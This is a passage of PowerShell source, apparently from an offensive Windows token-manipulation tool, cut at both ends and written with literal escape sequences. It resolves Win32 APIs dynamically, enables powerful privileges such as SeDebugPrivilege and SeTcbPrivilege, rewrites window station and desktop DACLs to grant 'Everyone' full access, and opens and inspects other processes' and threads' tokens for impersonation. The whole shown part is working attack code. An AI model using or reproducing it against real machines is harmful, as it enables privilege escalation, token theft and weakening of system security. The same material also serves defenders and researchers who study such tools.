kernel32.dll LocalFree\n    $LocalFreeDelegate = Get-DelegateType @([IntPtr]) ([IntPtr])\n    $LocalFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LocalFreeAddr, $LocalFreeDelegate)\n\n    $LookupPrivilegeNameWAddr = Get-ProcAddress advapi32.dll LookupPrivilegeNameW\n    $LookupPrivilegeNameWDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UInt32].MakeByRefType()) ([Bool])\n    $LookupPrivilegeNameW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeNameWAddr, $LookupPrivilegeNameWDelegate)\n    ###############################\n\n\n    #Used to add 64bit memory addresses\n    Function Add-SignedIntAsUnsigned\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[Int64]\n\t\t$Value1,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[Int64]\n\t\t$Value2\n\t\t)\n\t\t\n\t\t[Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)\n\t\t[Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)\n\t\t[Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)\n\n\t\tif ($Value1Bytes.Count -eq $Value2Bytes.Count)\n\t\t{\n\t\t\t$CarryOver = 0\n\t\t\tfor ($i = 0; $i -lt $Value1Bytes.Count; $i++)\n\t\t\t{\n\t\t\t\t#Add bytes\n\t\t\t\t[UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver\n\n\t\t\t\t$FinalBytes[$i] = $Sum -band 0x00FF\n\t\t\t\t\n\t\t\t\tif (($Sum -band 0xFF00) -eq 0x100)\n\t\t\t\t{\n\t\t\t\t\t$CarryOver = 1\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$CarryOver = 0\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tThrow \"Cannot add bytearrays of different sizes\"\n\t\t}\n\t\t\n\t\treturn [BitConverter]::ToInt64($FinalBytes, 0)\n\t}\n\n\n    #Enable SeAssignPrimaryTokenPrivilege, needed to query security information for desktop DACL\n    function Enable-SeAssignPrimaryTokenPrivilege\n    {\t\n\t    [IntPtr]$ThreadHandle = $GetCurrentThread.Invoke()\n\t    if ($ThreadHandle -eq [IntPtr]::Zero)\n\t    {\n\t\t    Throw \"Unable to get the handle to the current thread\"\n\t    }\n\t\t\n\t    [IntPtr]$ThreadToken = [IntPtr]::Zero\n\t    [Bool]$Result = $OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)\n        $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\n\t    if ($Result -eq $false)\n\t    {\n\t\t    if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN)\n\t\t    {\n\t\t\t    $Result = $ImpersonateSelf.Invoke($Win32Constants.SECURITY_DELEGATION)\n\t\t\t    if ($Result -eq $false)\n\t\t\t    {\n\t\t\t\t    Throw (New-Object ComponentModel.Win32Exception)\n\t\t\t    }\n\t\t\t\t\n\t\t\t    $Result = $OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)\n\t\t\t    if ($Result -eq $false)\n\t\t\t    {\n\t\t\t\t    Throw (New-Object ComponentModel.Win32Exception)\n\t\t\t    }\n\t\t    }\n\t\t    else\n\t\t    {\n\t\t\t    Throw ([ComponentModel.Win32Exception] $ErrorCode)\n\t\t    }\n\t    }\n\n        $CloseHandle.Invoke($ThreadHandle) | Out-Null\n\t\n        $LuidSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID)\n        $LuidPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($LuidSize)\n        $LuidObject = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidPtr, [Type]$LUID)\n        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidPtr)\n\n\t    $Result = $LookupPrivilegeValue.Invoke($null, \"SeAssignPrimaryTokenPrivilege\", [Ref] $LuidObject)\n\n\t    if ($Result -eq $false)\n\t    {\n\t\t    Throw (New-Object ComponentModel.Win32Exception)\n\t    }\n\n        [UInt32]$LuidAndAttributesSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID_AND_ATTRIBUTES)\n        $LuidAndAttributesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($LuidAndAttributesSize)\n        $LuidAndAttributes = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidAndAttributesPtr, [Type]$LUID_AND_ATTRIBUTES)\n        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidAndAttributesPtr)\n\n        $LuidAndAttributes.Luid = $LuidObject\n        $LuidAndAttributes.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED\n\n        [UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TOKEN_PRIVILEGES)\n        $TokenPrivilegesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize)\n        $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesPtr, [Type]$TOKEN_PRIVILEGES)\n        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesPtr)\n\t    $TokenPrivileges.PrivilegeCount = 1\n\t    $TokenPrivileges.Privileges = $LuidAndAttributes\n\n        $Global:TokenPriv = $TokenPrivileges\n\n\t    $Result = $AdjustTokenPrivileges.Invoke($ThreadToken, $false, [Ref] $TokenPrivileges, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero)\n\t    if ($Result -eq $false)\n\t    {\n            Throw (New-Object ComponentModel.Win32Exception)\n\t    }\n\n        $CloseHandle.Invoke($ThreadToken) | Out-Null\n    }\n\n\n    #Enable SeSecurityPrivilege, needed to query security information for desktop DACL\n    function Enable-Privilege\n    {\n        Param(\n            [Parameter()]\n            [ValidateSet(\"SeAssignPrimaryTokenPrivilege\", \"SeAuditPrivilege\", \"SeBackupPrivilege\", \"SeChangeNotifyPrivilege\", \"SeCreateGlobalPrivilege\",\n                \"SeCreatePagefilePrivilege\", \"SeCreatePermanentPrivilege\", \"SeCreateSymbolicLinkPrivilege\", \"SeCreateTokenPrivilege\",\n                \"SeDebugPrivilege\", \"SeEnableDelegationPrivilege\", \"SeImpersonatePrivilege\", \"SeIncreaseBasePriorityPrivilege\",\n                \"SeIncreaseQuotaPrivilege\", \"SeIncreaseWorkingSetPrivilege\", \"SeLoadDriverPrivilege\", \"SeLockMemoryPrivilege\", \"SeMachineAccountPrivilege\",\n                \"SeManageVolumePrivilege\", \"SeProfileSingleProcessPrivilege\", \"SeRelabelPrivilege\", \"SeRemoteShutdownPrivilege\", \"SeRestorePrivilege\",\n                \"SeSecurityPrivilege\", \"SeShutdownPrivilege\", \"SeSyncAgentPrivilege\", \"SeSystemEnvironmentPrivilege\", \"SeSystemProfilePrivilege\",\n                \"SeSystemtimePrivilege\", \"SeTakeOwnershipPrivilege\", \"SeTcbPrivilege\", \"SeTimeZonePrivilege\", \"SeTrustedCredManAccessPrivilege\",\n                \"SeUndockPrivilege\", \"SeUnsolicitedInputPrivilege\")]\n            [String]\n            $Privilege\n        )\n\n\t    [IntPtr]$ThreadHandle = $GetCurrentThread.Invoke()\n\t    if ($ThreadHandle -eq [IntPtr]::Zero)\n\t    {\n\t\t    Throw \"Unable to get the handle to the current thread\"\n\t    }\n\t\t\n\t    [IntPtr]$ThreadToken = [IntPtr]::Zero\n\t    [Bool]$Result = $OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)\n        $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\n\t    if ($Result -eq $false)\n\t    {\n\t\t    if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN)\n\t\t    {\n\t\t\t    $Result = $ImpersonateSelf.Invoke($Win32Constants.SECURITY_DELEGATION)\n\t\t\t    if ($Result -eq $false)\n\t\t\t    {\n\t\t\t\t    Throw (New-Object ComponentModel.Win32Exception)\n\t\t\t    }\n\t\t\t\t\n\t\t\t    $Result = $OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)\n\t\t\t    if ($Result -eq $false)\n\t\t\t    {\n\t\t\t\t    Throw (New-Object ComponentModel.Win32Exception)\n\t\t\t    }\n\t\t    }\n\t\t    else\n\t\t    {\n\t\t\t    Throw ([ComponentModel.Win32Exception] $ErrorCode)\n\t\t    }\n\t    }\n\n        $CloseHandle.Invoke($ThreadHandle) | Out-Null\n\t\n        $LuidSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID)\n        $LuidPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($LuidSize)\n        $LuidObject = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidPtr, [Type]$LUID)\n        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidPtr)\n\n\t    $Result = $LookupPrivilegeValue.Invoke($null, $Privilege, [Ref] $LuidObject)\n\n\t    if ($Result -eq $false)\n\t    {\n\t\t    Throw (New-Object ComponentModel.Win32Exception)\n\t    }\n\n        [UInt32]$LuidAndAttributesSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID_AND_ATTRIBUTES)\n        $LuidAndAttributesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($LuidAndAttributesSize)\n        $LuidAndAttributes = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidAndAttributesPtr, [Type]$LUID_AND_ATTRIBUTES)\n        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidAndAttributesPtr)\n\n        $LuidAndAttributes.Luid = $LuidObject\n        $LuidAndAttributes.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED\n\n        [UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TOKEN_PRIVILEGES)\n        $TokenPrivilegesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize)\n        $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesPtr, [Type]$TOKEN_PRIVILEGES)\n        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesPtr)\n\t    $TokenPrivileges.PrivilegeCount = 1\n\t    $TokenPrivileges.Privileges = $LuidAndAttributes\n\n        $Global:TokenPriv = $TokenPrivileges\n\n        Write-Verbose \"Attempting to enable privilege: $Privilege\"\n\t    $Result = $AdjustTokenPrivileges.Invoke($ThreadToken, $false, [Ref] $TokenPrivileges, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero)\n\t    if ($Result -eq $false)\n\t    {\n            Throw (New-Object ComponentModel.Win32Exception)\n\t    }\n\n        $CloseHandle.Invoke($ThreadToken) | Out-Null\n        Write-Verbose \"Enabled privilege: $Privilege\"\n    }\n\n\n    #Change the ACL of the WindowStation and Desktop\n    function Set-DesktopACLs\n    {\n        Enable-Privilege -Privilege SeSecurityPrivilege\n\n        #Change the privilege for the current window station to allow full privilege for all users\n        $WindowStationStr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni(\"WinSta0\")\n        $hWinsta = $OpenWindowStationW.Invoke($WindowStationStr, $false, $Win32Constants.ACCESS_SYSTEM_SECURITY -bor $Win32Constants.READ_CONTROL -bor $Win32Constants.WRITE_DAC)\n\n        if ($hWinsta -eq [IntPtr]::Zero)\n        {\n            Throw (New-Object ComponentModel.Win32Exception)\n        }\n\n        Set-DesktopACLToAllowEveryone -hObject $hWinsta\n        $CloseHandle.Invoke($hWinsta) | Out-Null\n\n        #Change the privilege for the current desktop to allow full privilege for all users\n        $hDesktop = $OpenDesktopA.Invoke(\"default\", 0, $false, $Win32Constants.DESKTOP_GENERIC_ALL -bor $Win32Constants.WRITE_DAC)\n        if ($hDesktop -eq [IntPtr]::Zero)\n        {\n            Throw (New-Object ComponentModel.Win32Exception)\n        }\n\n        Set-DesktopACLToAllowEveryone -hObject $hDesktop\n        $CloseHandle.Invoke($hDesktop) | Out-Null\n    }\n\n\n    function Set-DesktopACLToAllowEveryone\n    {\n        Param(\n            [IntPtr]$hObject\n            )\n\n        [IntPtr]$ppSidOwner = [IntPtr]::Zero\n        [IntPtr]$ppsidGroup = [IntPtr]::Zero\n        [IntPtr]$ppDacl = [IntPtr]::Zero\n        [IntPtr]$ppSacl = [IntPtr]::Zero\n        [IntPtr]$ppSecurityDescriptor = [IntPtr]::Zero\n        #0x7 is window station, change for other types\n        $retVal = $GetSecurityInfo.Invoke($hObject, 0x7, $Win32Constants.DACL_SECURITY_INFORMATION, [Ref]$ppSidOwner, [Ref]$ppSidGroup, [Ref]$ppDacl, [Ref]$ppSacl, [Ref]$ppSecurityDescriptor)\n        if ($retVal -ne 0)\n        {\n            Write-Error \"Unable to call GetSecurityInfo. ErrorCode: $retVal\"\n        }\n\n        if ($ppDacl -ne [IntPtr]::Zero)\n        {\n            $AclObj = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ppDacl, [Type]$ACL)\n\n            #Add all users to acl\n            [UInt32]$RealSize = 2000\n            $pAllUsersSid = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($RealSize)\n            $Success = $CreateWellKnownSid.Invoke(1, [IntPtr]::Zero, $pAllUsersSid, [Ref]$RealSize)\n            if (-not $Success)\n            {\n                Throw (New-Object ComponentModel.Win32Exception)\n            }\n\n            #For user \"Everyone\"\n            $TrusteeSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TRUSTEE)\n            $TrusteePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TrusteeSize)\n            $TrusteeObj = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TrusteePtr, [Type]$TRUSTEE)\n            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TrusteePtr)\n            $TrusteeObj.pMultipleTrustee = [IntPtr]::Zero\n            $TrusteeObj.MultipleTrusteeOperation = 0\n            $TrusteeObj.TrusteeForm = $Win32Constants.TRUSTEE_IS_SID\n            $TrusteeObj.TrusteeType = $Win32Constants.TRUSTEE_IS_WELL_KNOWN_GROUP\n            $TrusteeObj.ptstrName = $pAllUsersSid\n\n            #Give full permission\n            $ExplicitAccessSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$EXPLICIT_ACCESS)\n            $ExplicitAccessPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($ExplicitAccessSize)\n            $ExplicitAccess = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExplicitAccessPtr, [Type]$EXPLICIT_ACCESS)\n            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ExplicitAccessPtr)\n            $ExplicitAccess.grfAccessPermissions = 0xf03ff\n            $ExplicitAccess.grfAccessMode = $Win32constants.GRANT_ACCESS\n            $ExplicitAccess.grfInheritance = $Win32Constants.OBJECT_INHERIT_ACE\n            $ExplicitAccess.Trustee = $TrusteeObj\n\n            [IntPtr]$NewDacl = [IntPtr]::Zero\n\n            $RetVal = $SetEntriesInAclW.Invoke(1, [Ref]$ExplicitAccess, $ppDacl, [Ref]$NewDacl)\n            if ($RetVal -ne 0)\n            {\n                Write-Error \"Error calling SetEntriesInAclW: $RetVal\"\n            }\n\n            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($pAllUsersSid)\n\n            if ($NewDacl -eq [IntPtr]::Zero)\n            {\n                throw \"New DACL is null\"\n            }\n\n            #0x7 is window station, change for other types\n            $RetVal = $SetSecurityInfo.Invoke($hObject, 0x7, $Win32Constants.DACL_SECURITY_INFORMATION, $ppSidOwner, $ppSidGroup, $NewDacl, $ppSacl)\n            if ($RetVal -ne 0)\n            {\n                Write-Error \"SetSecurityInfo failed. Return value: $RetVal\"\n            }\n\n            $LocalFree.Invoke($ppSecurityDescriptor) | Out-Null\n        }\n    }\n\n\n    #Get the primary token for the specified processId\n    function Get-PrimaryToken\n    {\n        Param(\n            [Parameter(Position=0, Mandatory=$true)]\n            [UInt32]\n            $ProcessId,\n\n            #Open the token with all privileges. Requires SYSTEM because some of the privileges are restricted to SYSTEM.\n            [Parameter()]\n            [Switch]\n            $FullPrivs\n        )\n\n        if ($FullPrivs)\n        {\n            $TokenPrivs = $Win32Constants.TOKEN_ALL_ACCESS\n        }\n        else\n        {\n            $TokenPrivs = $Win32Constants.TOKEN_ASSIGN_PRIMARY -bor $Win32Constants.TOKEN_DUPLICATE -bor $Win32Constants.TOKEN_IMPERSONATE -bor $Win32Constants.TOKEN_QUERY \n        }\n\n        $ReturnStruct = New-Object PSObject\n\n        $hProcess = $OpenProcess.Invoke($Win32Constants.PROCESS_QUERY_INFORMATION, $true, [UInt32]$ProcessId)\n        $ReturnStruct | Add-Member -MemberType NoteProperty -Name hProcess -Value $hProcess\n        if ($hProcess -eq [IntPtr]::Zero)\n        {\n            #If a process is a protected process it cannot be enumerated. This call should only fail for protected processes.\n            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n            Write-Verbose \"Failed to open process handle for ProcessId: $ProcessId. ProcessName $((Get-Process -Id $ProcessId).Name). Error code: $ErrorCode . This is likely because this is a protected process.\"\n            return $null\n        }\n        else\n        {\n            [IntPtr]$hProcToken = [IntPtr]::Zero\n            $Success = $OpenProcessToken.Invoke($hProcess, $TokenPrivs, [Ref]$hProcToken)\n\n            #Close the handle to hProcess (the process handle)\n            if (-not $CloseHandle.Invoke($hProcess))\n            {\n                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                Write-Warning \"Failed to close process handle, this is unexpected. ErrorCode: $ErrorCode\"\n            }\n            $hProcess = [IntPtr]::Zero\n\n            if ($Success -eq $false -or $hProcToken -eq [IntPtr]::Zero)\n            {\n                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                Write-Warning \"Failed to get processes primary token. ProcessId: $ProcessId. ProcessName $((Get-Process -Id $ProcessId).Name). Error: $ErrorCode\"\n                return $null\n            }\n            else\n            {\n                $ReturnStruct | Add-Member -MemberType NoteProperty -Name hProcToken -Value $hProcToken\n            }\n        }\n\n        return $ReturnStruct\n    }\n\n\n    function Get-ThreadToken\n    {\n        Param(\n            [Parameter(Position=0, Mandatory=$true)]\n            [UInt32]\n            $ThreadId\n        )\n\n        $TokenPrivs = $Win32Constants.TOKEN_ALL_ACCESS\n\n        $RetStruct = New-Object PSObject\n        [IntPtr]$hThreadToken = [IntPtr]::Zero\n\n        $hThread = $OpenThread.Invoke($Win32Constants.THREAD_ALL_ACCESS, $false, $ThreadId)\n        if ($hThread -eq [IntPtr]::Zero)\n        {\n            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n            if ($ErrorCode -ne $Win32Constants.ERROR_INVALID_PARAMETER) #The thread probably no longer exists\n            {\n                Write-Warning \"Failed to open thread handle for ThreadId: $ThreadId. Error code: $ErrorCode\"\n            }\n        }\n        else\n        {\n            $Success = $OpenThreadToken.Invoke($hThread, $TokenPrivs, $false, [Ref]$hThreadToken)\n            if (-not $Success)\n            {\n                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                if (($ErrorCode -ne $Win32Constants.ERROR_NO_TOKEN) -and  #This error is returned when the thread isn't impersonated\n                 ($ErrorCode -ne $Win32Constants.ERROR_INVALID_PARAMETER)) #Probably means the thread was closed\n                {\n                    Write-Warning \"Failed to call OpenThreadToken for ThreadId: $ThreadId. Error code: $ErrorCode\"\n                }\n            }\n            else\n            {\n                Write-Verbose \"Successfully queried thread token\"\n            }\n\n            #Close the handle to hThread (the thread handle)\n            if (-not $CloseHandle.Invoke($hThread))\n            {\n                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                Write-Warning \"Failed to close thread handle, this is unexpected. ErrorCode: $ErrorCode\"\n            }\n            $hThread = [IntPtr]::Zero\n        }\n\n        $RetStruct | Add-Member -MemberType NoteProperty -Name hThreadToken -Value $hThreadToken\n        return $RetStruct\n    }\n\n\n    #Gets important information about the token such as the logon type associated with the logon\n    function Get-TokenInformation\n    {\n        Param(\n            [Parameter(Position=0, Mandatory=$true)]\n            [IntPtr]\n            $hToken\n        )\n\n        $ReturnObj = $null\n\n        $TokenStatsSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TOKEN_STATISTICS)\n        [IntPtr]$TokenStatsPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenStatsSize)\n        [UInt32]$RealSize = 0\n        $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenStatistics, $TokenStatsPtr, $TokenStatsSize, [Ref]$RealSize)\n        if (-not $Success)\n        {\n            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n            Write-Warning \"GetTokenInformation failed. Error code: $ErrorCode\"\n        }\n        else\n        {\n            $TokenStats = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenStatsPtr, [Type]$TOKEN_STATISTICS)\n\n            #Query LSA to determine what the logontype of the session is that the token corrosponds to, as well as the username/domain of the logon\n            $LuidPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID))\n            [System.Runtime.InteropServices.Marshal]::StructureToPtr($TokenStats.AuthenticationId, $LuidPtr, $false)\n\n            [IntPtr]$LogonSessionDataPtr = [IntPtr]::Zero\n            $ReturnVal = $LsaGetLogonSessionData.Invoke($LuidPtr, [Ref]$LogonSessionDataPtr)\n            if ($ReturnVal -ne 0 -and $LogonSessionDataPtr -eq [IntPtr]::Zero)\n            {\n                Write-Warning \"Call to LsaGetLogonSessionData failed. Error code: $ReturnVal. LogonSessionDataPtr = $LogonSessionDataPtr\"\n            }\n            else\n            {\n                $LogonSessionData = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LogonSessionDataPtr, [Type]$SECURITY_LOGON_SESSION_DATA)\n                if ($LogonSessionData.Username.Buffer -ne [IntPtr]::Zero -and \n                    $LogonSessionData.LoginDomain.Buffer -ne [IntPtr]::Zero)\n                {\n                    #Get the username and domainname associated with the token\n                    $Username = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($LogonSessionData.Username.Buffer, $LogonSessionData.Username.Length/2)\n                    $Domain = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($LogonSessionData.LoginDomain.Buffer, $LogonSessionData.LoginDomain.Length/2)\n\n                    #If UserName is for the computer account, figure out what account it actually is (SYSTEM, NETWORK SERVICE)\n                    #Only do this for the computer account because other accounts return correctly. Also, doing this for a domain account \n                    #results in querying the domain controller which is unwanted.\n                    if ($Username -ieq \"$($env:COMPUTERNAME)`$\")\n                    {\n                        [UInt32]$Size = 100\n                        [UInt32]$NumUsernameChar = $Size / 2\n                        [UInt32]$NumDomainChar = $Size / 2\n                        [UInt32]$SidNameUse = 0\n                        $UsernameBuffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($Size)\n                        $DomainBuffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($Size)\n                        $Success = $LookupAccountSidW.Invoke([IntPtr]::Zero, $LogonSessionData.Sid, $UsernameBuffer, [Ref]$NumUsernameChar, $DomainBuffer, [Ref]$NumDomainChar, [Ref]$SidNameUse)\n\n                        if ($Success)\n                        {\n                            $Username = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($UsernameBuffer)\n                            $Domain = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($DomainBuffer)\n                        }\n                        else\n                        {\n                            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                            Write-Warning \"Error calling LookupAccountSidW. Error code: $ErrorCode\"\n                        }\n\n                        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($UsernameBuffer)\n                        $UsernameBuffer = [IntPtr]::Zero\n                        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($DomainBuffer)\n                        $DomainBuffer = [IntPtr]::Zero\n                    }\n\n                    $ReturnObj = New-Object PSObject\n                    $ReturnObj | Add-Member -Type NoteProperty -Name Domain -Value $Domain\n                    $ReturnObj | Add-Member -Type NoteProperty -Name Username -Value $Username    \n                    $ReturnObj | Add-Member -Type NoteProperty -Name hToken -Value $hToken\n                    $ReturnObj | Add-Member -Type NoteProperty -Name LogonType -Value $LogonSessionData.LogonType\n\n\n                    #Query additional info about the token such as if it is elevated\n                    $ReturnObj | Add-Member -Type NoteProperty -Name IsElevated -Value $false\n\n                    $TokenElevationSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TOKEN_ELEVATION)\n                    $TokenElevationPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenElevationSize)\n                    [UInt32]$RealSize = 0\n                    $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenElevation, $TokenElevationPtr, $TokenElevationSize, [Ref]$RealSize)\n                    if (-not $Success)\n                    {\n                        $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                        Write-Warning \"GetTokenInformation failed to retrieve TokenElevation status. ErrorCode: $ErrorCode\" \n                    }\n                    else\n                    {\n                        $TokenElevation = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenelevationPtr, [Type]$TOKEN_ELEVATION)\n                        if ($TokenElevation.TokenIsElevated -ne 0)\n                        {\n                            $ReturnObj.IsElevated = $true\n                        }\n                    }\n                    [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenElevationPtr)\n\n\n                    #Query the token type to determine if the token is a primary or impersonation token\n                    $ReturnObj | Add-Member -Type NoteProperty -Name TokenType -Value \"UnableToRetrieve\"\n\n                    [UInt32]$TokenTypeSize = 4\n                    [IntPtr]$TokenTypePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenTypeSize)\n                    [UInt32]$RealSize = 0\n                    $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenType, $TokenTypePtr, $TokenTypeSize, [Ref]$RealSize)\n                    if (-not $Success)\n                    {\n                        $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                        Write-Warning \"GetTokenInformation failed to retrieve TokenImpersonationLevel status. ErrorCode: $ErrorCode\"\n                    }\n                    else\n                    {\n                        [UInt32]$TokenType = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenTypePtr, [Type][UInt32])\n                        switch($TokenType)\n                        {\n                            1 {$ReturnObj.TokenType = \"Primary\"}\n                            2 {$ReturnObj.TokenType = \"Impersonation\"}\n                        }\n                    }\n                    [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenTypePtr)\n\n\n                    #Query the impersonation level if the token is an Impersonation token\n                    if ($ReturnObj.TokenType -ieq \"Impersonation\")\n                    {\n                        $ReturnObj | Add-Member -Type NoteProperty -Name ImpersonationLevel -Value \"UnableToRetrieve\"\n\n                        [UInt32]$ImpersonationLevelSize = 4\n                        [IntPtr]$ImpersonationLevelPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($ImpersonationLevelSize) #sizeof uint32\n                        [UInt32]$RealSize = 0\n                        $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenImpersonationLevel, $ImpersonationLevelPtr, $ImpersonationLevelSize, [Ref]$RealSize)\n                        if (-not $Success)\n                        {\n                            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                            Write-Warning \"GetTokenInformation failed to retrieve TokenImpersonationLevel status. ErrorCode: $ErrorCode\"\n                        }\n                        else\n                        {\n                            [UInt32]$ImpersonationLevel = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImpersonationLevelPtr, [Type][UInt32])\n                            switch ($ImpersonationLevel)\n                            {\n                                0 { $ReturnObj.ImpersonationLevel = \"SecurityAnonymous\" }\n                                1 { $ReturnObj.ImpersonationLevel = \"SecurityIdentification\" }\n                                2 { $ReturnObj.ImpersonationLevel = \"SecurityImpersonation\" }\n                                3 { $ReturnObj.ImpersonationLevel = \"SecurityDelegation\" }\n                            }\n                        }\n                        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ImpersonationLevelPtr)\n                    }\n\n\n                    #Query the token sessionid\n                    $ReturnObj | Add-Member -Type NoteProperty -Name SessionID -Value \"Unknown\"\n\n                    [UInt32]$TokenSessionIdSize = 4\n                    [IntPtr]$TokenSessionIdPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenSessionIdSize)\n                    [UInt32]$RealSize = 0\n                    $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenSessionId, $TokenSessionIdPtr, $TokenSessionIdSize, [Ref]$RealSize)\n                    if (-not $Success)\n                    {\n                        $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                        Write-Warning \"GetTokenInformation failed to retrieve Token SessionId. ErrorCode: $ErrorCode\"\n                    }\n                    else\n                    {\n                        [UInt32]$TokenSessionId = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenSessionIdPtr, [Type][UInt32])\n                        $ReturnObj.SessionID = $TokenSessionId\n                    }\n                    [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenSessionIdPtr)\n\n\n                    #Query the token 